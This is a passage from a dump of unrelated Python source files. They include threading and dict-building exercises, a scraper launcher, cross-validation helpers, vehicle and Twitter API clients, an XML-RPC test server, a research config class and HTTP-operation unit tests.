## the main program builds some threads
## and makes sure it works
if __name__ == '__main__':
    items = 5
    print("putting %s items in the box" % items)
    box = Box()
    # Run the adder and the remover concurrently against the same Box; the
    # RLock inside Box keeps each counter update atomic.
    t1 = threading.Thread(target=adder, args=(box, items))
    t2 = threading.Thread(target=remove, args=(box, items))
    t1.start()
    t2.start()
    # Wait for both workers; the net count should be back to 0.
    t1.join()
    t2.join()
    print("%s items still remain in the box " % box.total_items)
992,137 | 0dfeb683cbca8ff5d2e7278ed82a8a93f1f7c320 | """ Task 3
Создать два списка с различным количеством элементов.
В первом должны быть записаны ключи, во втором — значения.
Необходимо написать функцию, создающую из данных ключей и значений словарь.
Если ключу не хватает значения, в словаре для него должно сохраняться
значение None. Значения, которым не хватило ключей, необходимо отбросить.
"""
def get_dict(keys: iter, values: iter) -> dict:
    """Zip keys with values into a dict, padding missing values with None
    and discarding values that have no key.

    :param keys: sequence of hashable keys
    :param values: sequence of values
    :return: dict built from the two sequences
    """
    padded = list(values[:len(keys)])
    padded.extend([None] * (len(keys) - len(padded)))
    return dict(zip(keys, padded))
if __name__ == '__main__':
    # Demo: three values for six keys -> the last three keys map to None.
    keys_list = [1, 'abc', (1, 2), 5, 9, 0]
    values_list = ['lorem', 'ipsum', {'key': 'val'}]
    print(get_dict(keys_list, values_list))
|
992,138 | 8a64037d01157dab1b6c574190b13e279d6140c1 | import zacks #1
import bloomberg #2
import cnbc #3
import investing #4
import fidelity #5
import yahoo #6
import json
import threading
import datetime
from datetime import timedelta
from datetime import datetime
# Thin wrappers giving every scraper module an identical, picklable entry
# point so each can be used uniformly as a thread target.
def ZACKS(start_date, stop_date,output_path):
    zacks.func(start_date, stop_date,output_path)
def BLOOMBERG(start_date, stop_date,output_path):
    bloomberg.func(start_date, stop_date,output_path)
def CNBC(start_date, stop_date,output_path):
    cnbc.func(start_date, stop_date,output_path)
def INVESTING(start_date, stop_date,output_path):
    investing.func(start_date, stop_date,output_path)
def FIDELITY(start_date, stop_date,output_path):
    fidelity.func(start_date, stop_date,output_path)
def YAHOO(start_date, stop_date,output_path):
    yahoo.func(start_date, stop_date,output_path)
# Read the run configuration; all knobs live in one JSON settings file.
with open(r'C:\Users\hp\Desktop\scrapingProject\calender\calendarScriptsTogether\settingsFileCalendar.txt') as json_file:
    data = json.load(json_file)
    site = (data['sites'])                  # list of site numbers (1..6) to run
    start_date = (data['start_date'])       # only used when mode_of_dates == 1
    stop_date = (data['stop_date'])
    output_path = (data['output_path'])
    simultanious = (data['simultanious'])   # 1 = threaded, 0 = sequential
    mode_of_dates = (data['mode_of_dates']) # 1 = fixed dates, 2 = rolling window
    days_for_mode_2 = (data['days_for_mode_2'])
# Dispatch: run the selected scrapers either simultaneously (threads) or one
# at a time, for either the configured date range (mode 1) or a rolling
# window of days_for_mode_2 days starting today (mode 2).
def _launch_scrapers(start_date, stop_date, output_path, simultanious, site):
    """Run every scraper whose number appears in `site`.

    simultanious == 1 runs each in its own thread, 0 runs them serially;
    any other value does nothing (matching the original if/elif behaviour).
    Replaces four near-identical copy-pasted if-chains from the original.
    """
    if simultanious not in (0, 1):
        return
    scrapers = [(1, 'zacks', ZACKS), (2, 'bloomberg', BLOOMBERG),
                (3, 'cnbc', CNBC), (4, 'investing', INVESTING),
                (5, 'fidelity', FIDELITY), (6, 'yahoo', YAHOO)]
    for number, name, runner in scrapers:
        if number in site:
            print("gonna start " + name)
            if simultanious == 1:
                threading.Thread(target=runner,
                                 args=(start_date, stop_date, output_path)).start()
            else:
                runner(start_date, stop_date, output_path)


if mode_of_dates == 1:
    _launch_scrapers(start_date, stop_date, output_path, simultanious, site)
elif mode_of_dates == 2:
    # Rolling window: from today to today + days_for_mode_2, dd-mm-YYYY.
    start_date = datetime.today().strftime("%d-%m-%Y")
    start = datetime.strptime(start_date, "%d-%m-%Y")
    finish = start + timedelta(days=days_for_mode_2)
    stop_date = finish.strftime("%d-%m-%Y")
    _launch_scrapers(start_date, stop_date, output_path, simultanious, site)
992,139 | 3846d4250f5f43cdc8311b3a2f6008e61acfeb9a | '''
This file will hold logic for n-fold cross validation.
Methods:
*generateCrossValidationSets(X, Y, k=5, trainingMethod=None) normal creation of cross validation sets.
*leaveOneOutCrossValidation(X,Y, trainingMethod=None) has test set of length 1. All others become part of training set.
'''
import numpy as np
import random
def generateCrossValdiationSets(X, Y, k=5, trainingMethod=None):
    '''
    Generate each combination of test and validation sets.
    Providing a training method will automatically run the trainingMethod provided.
    If it is not provided the train/test set combo is added to a folds list and returned.
    Parameters:
        X: The list of parameters
        Y: The list of labels
        k: how many partitions to create
        trainingMethod: a function that should have X,Y as its parameters that will be called every time a partition is created
    Result:
        None if trainingMethod is provided. Else folds is returned which is a list of every combination of train and test sets.
    '''
    #calculate the size of each partition
    # NOTE(review): float division; each partition later takes int(size)
    # items, so up to k-1 trailing samples are silently dropped when
    # len(X) is not divisible by k.
    size = np.shape(X)[0]
    size /= k
    #holds the final datasets
    folds = []
    #randomize dataset order
    indexOrdering = getRandomOrdering(X)
    #partition
    for testSetPart in range(k):
        index = 0
        currSet = []
        #for each partition
        for i in range(k):
            partX = []
            partY = []
            #for each item that would belong in the first partition
            for j in range(int(size)):
                #add the item
                partX.append(X[indexOrdering[index]])
                partY.append(Y[indexOrdering[index]])
                #move index forward
                index += 1
            #add this to this folds set
            currSet.append((partX, partY))
        #choose the set marked by testSetPart as the partition that will be the test set.
        testX = currSet[testSetPart][0]
        testY = currSet[testSetPart][1]
        trainX = []
        trainY = []
        #combine other sets
        for i in range(k):
            #if pos i is not delegated as the testSet, append its items to the train set
            if i != testSetPart:
                #get the x, y sets at this index
                currX, currY = currSet[i]
                #for each item
                for j in range(len(currX)):
                    #add them to the training set
                    trainX.append(currX[j])
                    trainY.append(currY[j])
        #if a method is provided. this directly runs that trainer. This can save memory in preventing the creation of folds
        if trainingMethod != None:
            trainingMethod((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
        else:
            folds.append((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
    return folds
def leaveOneOutCrossValidation(X, Y, trainingMethod=None):
    '''
    Creates each possibility for leave one out cross validation
    Note:
        It does not seem ideal to run this without providing a trainingMethod.
    Parameters:
        X: The list of parameters
        Y: The list of labels
        trainingMethod: a function that should have X,Y as its parameters that will be called every time a partition is created
    Result:
        None if trainingMethod is provided. Else folds is returned which is a list of every combination of train and test sets.
    '''
    #get size of input
    size = int(np.shape(X)[0])
    #get shuffler and apply it once up front
    indexOrdering = getRandomOrdering(X)
    shuffledX = [X[i] for i in indexOrdering]
    shuffledY = [Y[i] for i in indexOrdering]
    #holds the output datasets
    folds = []
    #each index in turn becomes the single test sample
    for testExample in range(size):
        testX = shuffledX[testExample]
        testY = shuffledY[testExample]
        # Bug fix: np.delete without an axis flattens multi-dimensional
        # input, destroying per-sample feature rows; axis=0 removes only the
        # selected row (identical behaviour for 1-D input).
        trainX = np.delete(np.array(shuffledX), testExample, axis=0)
        trainY = np.delete(np.array(shuffledY), testExample, axis=0)
        if trainingMethod is not None:
            trainingMethod((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
        else:
            folds.append((np.array(trainX), np.array(trainY), np.array(testX), np.array(testY)))
    return folds
def getRandomOrdering(X):
    '''
    Build a shuffled list of indices instead of shuffling the data itself.
    Parameters:
        X: List of parameters to learn on
    Result:
        A shuffled list of indexes, same length as X.
    '''
    order = list(range(int(np.shape(X)[0])))
    random.shuffle(order)
    return order
992,140 | 53b6ed510d2c0b1205c33203bfab3844a01662e3 | from __future__ import annotations
from typing import Dict, Union
import requests
from pvaw.constants import VEHICLE_API_PATH
from pvaw.results import Results, ResultsList
class Manufacturer(Results):
    """A single manufacturer record from the NHTSA vPIC API.

    Pulls the commonly used fields out of the raw results_dict; the full
    dict remains available through the Results base class.
    """
    def __init__(self, man_id: Union[str, int], results_dict: Dict[str, str]):
        super().__init__(man_id, results_dict)
        self.common_name = results_dict["Mfr_CommonName"]
        self.name = results_dict["Mfr_Name"]
        # Flatten the nested VehicleTypes dicts down to their names.
        self.vehicle_types = [d["Name"] for d in results_dict["VehicleTypes"]]
        self.id = results_dict["Mfr_ID"]
def get_manufacturers(m_type: str = None, page: int = 1) -> ResultsList:
    """Fetch one page of all manufacturers, optionally filtered by type.

    :param m_type: optional manufacturer type filter (spaces URL-encoded)
    :param page: 1-based result page
    :raises TypeError: when m_type is not a str or page is not an int
    """
    if m_type is not None:
        if not isinstance(m_type, str):
            raise TypeError("'m_type' must be a str")
    if not isinstance(page, int):
        raise TypeError("'page' parameter must be an int")
    query_parts = ["format=json"]
    if m_type is not None:
        query_parts.append("ManufacturerType=" + "%20".join(m_type.split()))
    query_parts.append(f"page={page}")
    url = f"{VEHICLE_API_PATH}getallmanufacturers?" + "&".join(query_parts)
    rows = requests.get(url).json()["Results"]
    return ResultsList([Manufacturer(row["Mfr_ID"], row) for row in rows])
def get_manufacturer_details(manufacturer_name_or_id: Union[str, int]) -> ResultsList:
    """Query vPIC GetManufacturerDetails and wrap each result row.

    Despite matching a single manufacturer, the endpoint can return several
    rows, so a ResultsList of Manufacturer objects is returned (the original
    `-> Manufacturer` annotation did not match the actual return value).

    :raises TypeError: when the argument is neither str nor int
    """
    if not isinstance(manufacturer_name_or_id, (str, int)):
        raise TypeError("'manufacturer_name_or_id' must be a str or int")
    path = f"{VEHICLE_API_PATH}GetManufacturerDetails/{manufacturer_name_or_id}?format=json"
    response = requests.get(path)
    results_list = response.json()["Results"]
    return ResultsList(
        [
            Manufacturer(results_dict["Mfr_ID"], results_dict)
            for results_dict in results_list
        ]
    )
|
992,141 | c9867ed99f456907f88f3a1a923c51360ca08d9b | import pymongo
import Twitter_Request
import requests as r
import json
import Twitter_Token_Utils
import hashlib
import time
def check_update(file_hash):
    """Return True iff the MD5 of user_ids.txt still equals *file_hash*.

    Used to detect edits to the id file while the poller is running. The
    file handle is now closed via `with` even if reading raises.
    """
    with open("user_ids.txt", 'rb') as f:
        return hashlib.md5(f.read()).hexdigest() == file_hash
def update_search_terms(search_terms):
    """Merge ids from user_ids.txt into *search_terms* (mutated in place).

    Newly seen ids start at since_id 1; ids already tracked keep their
    stored since_id. Bug fix: membership used to be tested on the raw line
    (with its trailing newline) while keys are stored stripped, so every
    refresh reset all existing counters back to 1. Blank lines are skipped.
    """
    with open("user_ids.txt", "r") as f:
        for raw in f:
            term = raw.rstrip()
            if term and term not in search_terms:
                search_terms[term] = 1
    return search_terms
def get_tweets(params, term, since_id, collection):
    """Fetch one page of a user's timeline and insert each tweet into Mongo.

    Returns the id to use as the next since_id, or the incoming since_id
    unchanged if anything in the response handling raises.
    """
    params['user_id'] = term
    params['since_id'] = since_id
    # Build and sign the request through the project's Twitter_Request helper.
    TR = Twitter_Request.Request(params, user=True).get_request(custom_query = True)
    TR = TR.prepare()
    session = r.Session()
    resp = session.send(TR)
    print(resp.text)
    tweets = json.loads(resp.text)
    ret_val = since_id
    try:
        for each in tweets:
            print(each['created_at'], each['id'])
            collection.insert_one(each)
        # NOTE(review): user_timeline responses are JSON lists with no
        # 'search_metadata' key, so this lookup appears to always raise and
        # leave ret_val at since_id — confirm whether max_id tracking works.
        ret_val = tweets['search_metadata']['max_id']
    except Exception as e:
        # Broad catch: any parse/insert failure is printed and swallowed.
        print(e)
    session.close()
    time.sleep(10)  # crude rate limiting between API calls
    return ret_val
    # return tweets['search_metadata']['max_id']
# myclient = pymongo.MongoClient("mongodb://loc")
def main():
    """Poll every tracked user's timeline forever, persisting tweets to Mongo."""
    # OAuth credentials plus fixed request parameters for user_timeline.
    tokens = Twitter_Token_Utils.get_tokens()
    params = {}
    params["oauth_consumer_key"] = tokens['API']
    params["oauth_access_key"] = tokens ['ACCESS']
    params["oauth_consumer_key_secret"] = tokens["API_SECRET"]
    params["oauth_access_key_secret"] = tokens ["ACCESS_SECRET"]
    params['url'] = "https://api.twitter.com/1.1/statuses/user_timeline.json"
    params['request_type'] = "GET"
    params['count'] = 200
    # params['result_type'] = "recent"
    # Hash the id file once so edits can be detected while running.
    f = open("user_ids.txt",'rb')
    file_hash = hashlib.md5(f.read()).hexdigest()
    f.close()
    search_terms = {}
    search_terms = update_search_terms(search_terms)
    print(search_terms)
    myclient = pymongo.MongoClient("mongodb://localhost:27017/")
    twitter_db = myclient["twitter_data"]
    collection = twitter_db["user_tweets"]
    # get_tweets(params, "Donald Trump",search_terms['Donald Trump'], collection)
    while(True):
        # Reload ids whenever the file changed on disk.
        if (not check_update(file_hash)):
            search_terms = update_search_terms(search_terms)
        for each in search_terms:
            search_terms[each] = get_tweets(params, each, search_terms[each],collection)
# Guard the entry point so importing this module no longer starts the
# infinite polling loop as a side effect.
if __name__ == "__main__":
    main()
|
992,142 | d66d7afd3545e0f292a4c28898890b85e6ed2b46 | from utils.mappers import *
from utils.scn_libs import *
from SimpleXMLRPCServer import SimpleXMLRPCServer
from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler
import xml.dom.minidom
import xml.dom
import collections
import types
import os
class start_rpc_server:
    """Bootstraps the XML-RPC endpoint; constructing an instance blocks forever."""
    def __init__(self):
        # NOTE(review): serve_forever() never returns, so __init__ blocks;
        # the bind address is hard-coded — confirm 192.168.0.1:12306.
        server = SimpleXMLRPCServer(("192.168.0.1",12306),requestHandler=RequestHandler)
        server.register_instance(squish_rpc_server())
        print 'server started and listening on port 12306'
        server.serve_forever()
# Restrict to a particular path.
class RequestHandler(SimpleXMLRPCRequestHandler):
    """Only serve XML-RPC requests addressed to /RPC2."""
    rpc_paths = ('/RPC2',)
class squish_rpc_server(object):
    """XML-RPC facade mapping incoming XML test requests onto GUI-test
    scenarios via the project's mapper utilities."""
    def __init__(self):
        # Scenario mapper, test-data mapper, and the XML request parser.
        self._scn_mapper = nmon_scn_mapper(versatile_lib, n_mon_lib)
        self._td_mapper = testdata_OM_mapper(None, None)
        self._xml_handler = xml_handler('1.0', None)
    def perform_GUI_test(self, xml_data):
        """Parse xml_data into (name, value) items and run each mapped scenario.

        NOTE(review): 'paris' is presumably a typo for 'pairs'. Always
        returns True, even when a scenario fails.
        """
        print 'received data %s' % xml_data
        paris = self._xml_handler.handle(xml_data)
        print paris
        for item in paris:
            print item
        for item in paris:
            self._scn_mapper.get_scn(item.get_name())(self._scn_mapper, self._td_mapper.get_data(item.get_value()))
        return True
|
992,143 | 938301a65e55e44aa4f2d5190d66952414875028 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 09:58:47 2016
@author: Eli Van Cleve
"""
import numpy as np
#import csv
import pandas as pd
#dir = '/mnt/g/Eli/RadiaBeam/SQF/'
dir = 'G:/Eli/RadiaBeam/SQF/'
# Ask for the CSV to clean; the output file gets a '-clean' suffix.
filename = input ("Enter File Name: ")
save = filename[:-4]+'-clean.csv'
print (dir+filename)
# NOTE(review): error_bad_lines is deprecated in newer pandas (use
# on_bad_lines='skip') — confirm the pinned pandas version.
data = pd.read_csv(dir+filename, error_bad_lines=False)
Lsize = len(data.Freq)
#Lsize = len(data.lambda(GHz))
colN = len(data.iloc[0])
# Collect column names into a numpy array for the output DataFrame.
colNa = np.array([])
for col in data.columns:
    colNa = np.append(colNa,col)
StoreData = []
dataA = data.to_numpy()
leng = len(dataA)
# Keep only rows whose frequency lies strictly between 4 and 9 (GHz).
for i in range(leng):
    if (9 > data.Freq[i] > 4):
        StoreData.append(dataA[i])
df = pd.DataFrame(StoreData, columns = colNa)
print (df)
df.to_csv(dir+save, index = False)
|
992,144 | 35bc20269914b5396650fac7b79e8cf342c4e47c | # -*- coding: utf-8 -*-
"""Configuration parameters for each dataset and task."""
import logging
from math import ceil
import os
from os import path as osp
from colorlog import ColoredFormatter
from common.config import Config
class ResearchConfig(Config):
"""
A class to configure global or dataset/task-specific parameters.
Inputs (see common.config.py for parent arguments):
Dataset/task:
- net_name: str, name of trained model
- phrase_recall: bool, whether to evaluate phrase recall
- test_dataset: str or None, dataset to evaluate
Data handling params:
- annotations_per_batch: int, number of desired annotations
per batch on average, in terms of relations or objects
- augment_annotations: bool, distort boxes to augment
Evaluation params:
- compute_accuracy: bool, measure accuracy, not recall
- use_merged: bool, use merged annotations in evaluation
Loss functions:
- use_multi_tasking: bool, use multi-tasking to
separately decide for object relevance
- use_weighted_ce: bool, use weighted cross-entropy
Training params:
- batch_size: int or None, batch size in images (if custom)
- epochs: int or None, number of training epochs
- learning_rate: float, learning rate of classifier
- weight_decay: float, weight decay of optimizer
Learning rate policy:
- apply_dynamic_lr: bool, adapt lr to preserve
lr / annotations per batch
- use_early_stopping: bool, lr policy with early stopping
- restore_on_plateau: bool, whether to restore checkpoint
on validation metric's plateaus (only effective in early
stopping)
- patience: int, number of epochs to consider a plateau
General:
- commit: str, commit name to tag model
- num_workers: int, workers employed by the data loader
"""
    def __init__(self, net_name='', phrase_recall=False, test_dataset=None,
                 annotations_per_batch=128, augment_annotations=True,
                 compute_accuracy=False, use_merged=False,
                 use_multi_tasking=True,
                 use_weighted_ce=False, batch_size=None, epochs=None,
                 learning_rate=0.002, weight_decay=None,
                 apply_dynamic_lr=False, use_early_stopping=True,
                 restore_on_plateau=True, patience=1, commit='', num_workers=2,
                 **kwargs):
        """Initialize configuration instance (arguments in class docstring)."""
        super().__init__(**kwargs)
        # sgcls/sggen share predcls model names; UnRel evaluation re-uses
        # models trained on VRD.
        self.net_name = '_'.join([
            net_name,
            (self.task if self.task not in {'sgcls', 'sggen'} else 'predcls'),
            self.dataset if self.dataset != 'UnRel' else 'VRD'
        ])
        self.phrase_recall = phrase_recall
        # Default to evaluating on the training dataset.
        self.test_dataset = (
            self.dataset if test_dataset is None
            else test_dataset
        )
        self._annotations_per_batch = annotations_per_batch
        self.augment_annotations = augment_annotations
        self.use_multi_tasking = use_multi_tasking
        self.use_weighted_ce = use_weighted_ce
        # Accuracy measurement is only supported for the preddet task.
        self.compute_accuracy = compute_accuracy and self.task == 'preddet'
        self.use_merged = use_merged
        self._batch_size = batch_size
        self._epochs = epochs
        self.learning_rate = learning_rate
        self._weight_decay = weight_decay
        self.apply_dynamic_lr = apply_dynamic_lr
        self.use_early_stopping = use_early_stopping
        self.restore_on_plateau = restore_on_plateau
        self.patience = patience
        # Commit tag always embeds the net name -> unique model/result dirs.
        self.commit = (
            commit + '_' + self.net_name if commit != ''
            else self.net_name
        )
        self.num_workers = num_workers
        self._set_dataset_task_annos_per_img()
        self._set_logger()
    def reset(self, custom_dataset=None):
        """Reset instance to handle another dataset.

        Defaults to the configured test_dataset; pass custom_dataset to
        target any other supported dataset.
        """
        self.dataset = (
            self.test_dataset if custom_dataset is None
            else custom_dataset
        )
        # Re-derive dataset-dependent class info (defined on the Config base).
        self._set_dataset_classes(self.dataset)
    def _set_dataset_task_annos_per_img(self):
        """
        Different number of image-wise annotations per dataset-task.
        All fields except for 'objects' refer to predicate annotations:
            - If duplicates_filtered, clear relations annotated > 1 time
            - If predicates_filtered, sample a single predicate per pair
            - If pairs, use all possible pairs of objects
        """
        # Offline-measured per-image statistics, consumed by the
        # annotations_per_batch / batch_size / max_obj_dets_per_img
        # properties to convert between image and annotation counts.
        self._annos_per_img = {
            'VG200': {
                'relations': 6.98,
                'duplicates_filtered': 4.69,
                'predicates_filtered': 4.45,
                'objects': 10.87,
                'pairs': 146.3,
                'max_objects': 45,
            },
            'VG80K': {
                'relations': 21.96,
                'duplicates_filtered': 18.89,
                'predicates_filtered': 18.1,
                'objects': 23.48,
                'pairs': 696.85,
                'max_objects': 25
            },
            'VGMSDN': {
                'relations': 11.02,
                'duplicates_filtered': 9.13,
                'predicates_filtered': 8.79,
                'objects': 12.48,
                'pairs': 190.05,
                'max_objects': 83
            },
            'VGVTE': {
                'relations': 10.94,
                'duplicates_filtered': 9.28,
                'predicates_filtered': 9.03,
                'objects': 13.04,
                'pairs': 243.76,
                'max_objects': 110
            },
            'VRD': {
                'relations': 8.02,
                'duplicates_filtered': 7.89,
                'predicates_filtered': 7.13,
                'objects': 7,
                'pairs': 52.98,
                'max_objects': 21
            },
            'VrR-VG': {
                'relations': 3.45,
                'duplicates_filtered': 3.03,
                'predicates_filtered': 2.97,
                'objects': 4.79,
                'pairs': 34.63,
                'max_objects': 64
            },
            'sVG': {
                'relations': 10.89,
                'duplicates_filtered': 8.36,
                'predicates_filtered': 8.11,
                'objects': 11.39,
                'pairs': 195.95,
                'max_objects': 119
            },
            # UnRel is evaluated with VRD statistics (same image set style).
            'UnRel': {
                'relations': 8.02,
                'duplicates_filtered': 7.89,
                'predicates_filtered': 7.13,
                'objects': 7,
                'pairs': 52.98,
                'max_objects': 21
            },
            # COCO has no relation annotations; only object stats matter.
            'COCO': {
                'relations': 0,
                'duplicates_filtered': 0,
                'predicates_filtered': 0,
                'objects': 12,
                'pairs': 0,
                'max_objects': 110,
            },
        }
def _set_logger(self):
"""Configure logger."""
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.DEBUG)
stream = logging.StreamHandler()
stream.setFormatter(ColoredFormatter(
'%(log_color)s%(asctime)s%(reset)s - %(levelname)s - %(message)s'))
self.logger.addHandler(stream)
    @property
    def annotations_per_batch(self):
        """Return batch size in terms of annotations.

        With a custom image batch size, converts it to an (average)
        annotation count using the per-image statistics; otherwise the
        requested annotations_per_batch value is used directly.
        """
        if self._batch_size is None or self.task in {'objdet', 'sggen'}:
            return self._annotations_per_batch
        annos_per_img = self._annos_per_img[self.dataset]
        if self.task in {'predcls', 'sgcls'}:
            annos_per_img = annos_per_img['pairs']
        elif self.task == 'objcls':
            annos_per_img = annos_per_img['objects']
        elif self.task == 'preddet' and self.filter_multiple_preds:
            annos_per_img = annos_per_img['predicates_filtered']
        elif self.task == 'preddet' and self.filter_duplicate_rels:
            annos_per_img = annos_per_img['duplicates_filtered']
        elif self.task == 'preddet':
            annos_per_img = annos_per_img['relations']
        # NOTE(review): unlike batch_size, the last branch omits 'sggen' —
        # harmless here because sggen returns early above, but confirm.
        return annos_per_img * self._batch_size
    @property
    def batch_size(self):
        """Return batch size in terms of images.

        An explicit _batch_size wins; objdet uses a fixed 8.  Otherwise the
        image count is derived by dividing the annotation budget by the
        dataset's average annotations per image for this task (mirror of
        annotations_per_batch), with a floor of 2 images.
        """
        if self._batch_size is not None:
            return self._batch_size  # custom batch size defined
        if self.task == 'objdet':
            return 8
        annos_per_img = self._annos_per_img[self.dataset]
        if self.task in {'predcls', 'sgcls'}:
            annos_per_img = annos_per_img['pairs']
        elif self.task == 'objcls':
            annos_per_img = annos_per_img['objects']
        elif self.task == 'preddet' and self.filter_multiple_preds:
            annos_per_img = annos_per_img['predicates_filtered']
        elif self.task == 'preddet' and self.filter_duplicate_rels:
            annos_per_img = annos_per_img['duplicates_filtered']
        elif self.task in {'preddet', 'sggen'}:
            annos_per_img = annos_per_img['relations']
        # ceil so the annotation budget is never under-used; minimum 2 images
        batch_size = ceil(self._annotations_per_batch / annos_per_img)
        return max(batch_size, 2)
@property
def epochs(self):
"""Return number of training epochs."""
if self._epochs is not None:
return self._epochs
return 50 if self.use_early_stopping else 10
    @property
    def logdir(self):
        """Return path of stored Tensorboard logs (runs/<net_name>/)."""
        # trailing '' makes osp.join emit a trailing separator
        return osp.join('runs/', self.net_name, '')
    @property
    def max_obj_dets_per_img(self):
        """Return number of maximum object detections per image.

        Capped at 64 even when the dataset's annotated maximum is larger.
        """
        return min(64, self._annos_per_img[self.dataset]['max_objects'])
@property
def paths(self):
"""Return a dict of paths useful to train/test/inference."""
paths = {
'json_path': self._json_path,
'models_path': osp.join(self.prerequisites_path,
'models', self.commit, ''),
'results_path': osp.join(self.prerequisites_path,
'results', self.commit, '')
}
if not osp.exists(osp.join(self.prerequisites_path, 'results', '')):
os.mkdir(osp.join(self.prerequisites_path, 'results', ''))
if not osp.exists(osp.join(self.prerequisites_path, 'models', '')):
os.mkdir(osp.join(self.prerequisites_path, 'models', ''))
for path in paths.values():
if not osp.exists(path):
os.mkdir(path)
return paths
@property
def weight_decay(self):
"""Return weight decay for an optimizer."""
if self._weight_decay is not None:
return self._weight_decay
return 5e-5 if 'VG' in self.dataset else 5e-4
|
"""Greedy coin change.

Compute the minimum number of coins needed to give N won in change using
500-, 100-, 50- and 10-won coins.  N is always a multiple of 10, and since
each denomination divides the next larger one, the greedy choice is optimal.
"""
COINS = [500, 100, 50, 10]  # denominations, largest first (greedy order)


def min_coin_count(amount, coins=COINS):
    """Return the minimum number of coins from *coins* summing to *amount*."""
    count = 0
    for coin in coins:
        count += amount // coin  # take as many of the largest coin as fit
        amount %= coin
    return count


if __name__ == '__main__':
    # fix: the original wrote `for money in money`, shadowing the coin list
    # with the loop variable; the logic is now in a testable helper.
    N = int(input('N원을 입력하시오(단 N는10의 배수) : '))
    print(min_coin_count(N))
992,146 | 64394ea4654d8477355f1337e0bb5906e4c7202f | from unittest import TestCase, mock
from unittest.mock import patch
from core.httpoperation import HttpOperation
from tests.core.replicatortest import ReplicatorTest
def mock_request_get(url, params=None, headers=None):
    """Stand-in for requests.get used with @patch; returns None."""
    return None
def mock_request_post(url, data=None, json=None, headers=None):
    """Stand-in for requests.post used with @patch; returns None."""
    return None
def mock_request_delete(url, headers=None):
    """Stand-in for requests.delete used with @patch; returns None."""
    return None
def mock_request_put(url, data=None, headers=None):
    """Stand-in for requests.put used with @patch; returns None."""
    return None
class HttpOperationTest(TestCase):
    """Unit tests for HttpOperation against a sample Swagger 2.0 operation.

    SAMPLE_OP_INFOS is the 'updatePetWithForm' operation from the petstore
    example: one required path parameter (petId) and two optional formData
    parameters (name, status).  requests.* is patched with the no-op mock_*
    helpers above, and assertions inspect the recorded call arguments.
    """
    SAMPLE_OP_INFOS = {
        "tags": [
            "pet"
        ],
        "summary": "Updates a pet in the store with form data",
        "description": "",
        "operationId": "updatePetWithForm",
        "consumes": [
            "application/x-www-form-urlencoded"
        ],
        "produces": [
            "application/xml",
            "application/json"
        ],
        "parameters": [
            {
                "name": "petId",
                "in": "path",
                "description": "ID of pet that needs to be updated",
                "required": True,
                "type": "integer",
                "format": "int64"
            },
            {
                "name": "name",
                "in": "formData",
                "description": "Updated name of the pet",
                "required": False,
                "type": "string"
            },
            {
                "name": "status",
                "in": "formData",
                "description": "Updated status of the pet",
                "required": False,
                "type": "string"
            }
        ],
        "responses": {
            "405": {
                "description": "Invalid input"
            }
        },
        "security": [
            {
                "petstore_auth": [
                    "write:pets",
                    "read:pets"
                ]
            }
        ]
    }
    def setUp(self):
        # Default operation under test: POST with an API-key header.
        self.http_op = HttpOperation('post', 'https://server.de/', 'pet/{petId}/uploadImage', self.SAMPLE_OP_INFOS,
                                     {"X-API-Key": "abcdef123"}, False)
    def test_replace_url_parameter_replaces_placeholder_in_url_with_type_value(self):
        # {petId} is filled with the sample value for type 'integer' (0).
        url = self.http_op.replace_url_parameter(ReplicatorTest.SAMPLE_DEFINITION, self.http_op.url, 'petId', 'integer')
        self.assertEqual(url, 'https://server.de/pet/0/uploadImage')
    def test_replace_url_parameter_replaces_only_named_param(self):
        # Only {imgName} is substituted; {petId} is left untouched.
        url = self.http_op.replace_url_parameter(ReplicatorTest.SAMPLE_DEFINITION,
                                                 'https://server.de/pet/{petId}/uploadImage/{imgName}',
                                                 'imgName', 'string')
        self.assertEqual(url, 'https://server.de/pet/{petId}/uploadImage/')
    def test_create_form_parameter_makes_instance_of_type_as_string(self):
        # Form parameters are always serialized as strings.
        value = self.http_op.create_form_parameter(ReplicatorTest.SAMPLE_DEFINITION, 'integer')
        self.assertEqual(value, '0')
    def test_execute_with_unrecognizable_http_op_will_result_in_Nonetype_response(self):
        # Unknown verbs ('OGRE') are not dispatched and yield None.
        self.http_op = HttpOperation('OGRE', 'https://server.de/', 'pet/{petId}/uploadImage', self.SAMPLE_OP_INFOS,
                                     {"X-API-Key": "abcdef123"}, False)
        result = self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
        self.assertIsNone(result)
    @patch('requests.get', side_effect=mock_request_get)
    def test_execute_with_parameter_definition_will_send_request_without_parameters_set(self, mock_get):
        # Without a 'parameters' section nothing is substituted or sent.
        definition_no_parameters = self.SAMPLE_OP_INFOS
        definition_no_parameters.pop('parameters', 0)
        self.http_op = HttpOperation('get', 'https://server.de/', 'pet/{petId}/uploadImage', definition_no_parameters,
                                     {"X-API-Key": "abcdef123"}, False)
        self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
        self.assertIn(mock.call(params={}, headers={"X-API-Key": "abcdef123"},
                                url='https://server.de/pet/{petId}/uploadImage'), mock_get.call_args_list)
    @patch('requests.post', side_effect=mock_request_post)
    def test_execute_will_post__op_request_with_params_when_form_data_param_set(self, mock_post):
        # POST carries the formData params in the body (data=...).
        self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
        self.assertIn(mock.call(data={'status': '', 'name': ''}, json=None, headers={"X-API-Key": "abcdef123"},
                                url='https://server.de/pet/0/uploadImage'), mock_post.call_args_list)
    @patch('requests.get', side_effect=mock_request_get)
    def test_execute_will_get_op_request_with_url_and_params_when_form_data_param_set(self, mock_get):
        # GET carries the formData params as query params (params=...).
        self.http_op = HttpOperation('get', 'https://server.de/', 'pet/{petId}/uploadImage',
                                     self.SAMPLE_OP_INFOS, {"X-API-Key": "abcdef123"}, False)
        self.http_op.execute(ReplicatorTest.SAMPLE_DEFINITION)
        self.assertIn(mock.call(params={'status': '', 'name': ''},
                                url='https://server.de/pet/0/uploadImage', headers={"X-API-Key": "abcdef123"}),
                      mock_get.call_args_list)
    @patch('requests.delete', side_effect=mock_request_delete)
    def test_execute_will_delete_op_request_with_url_only(self, mock_delete):
        # DELETE sends no body or query parameters.
        self.http_op = HttpOperation('delete', 'https://server.de/', 'pet/{petId}/uploadImage',
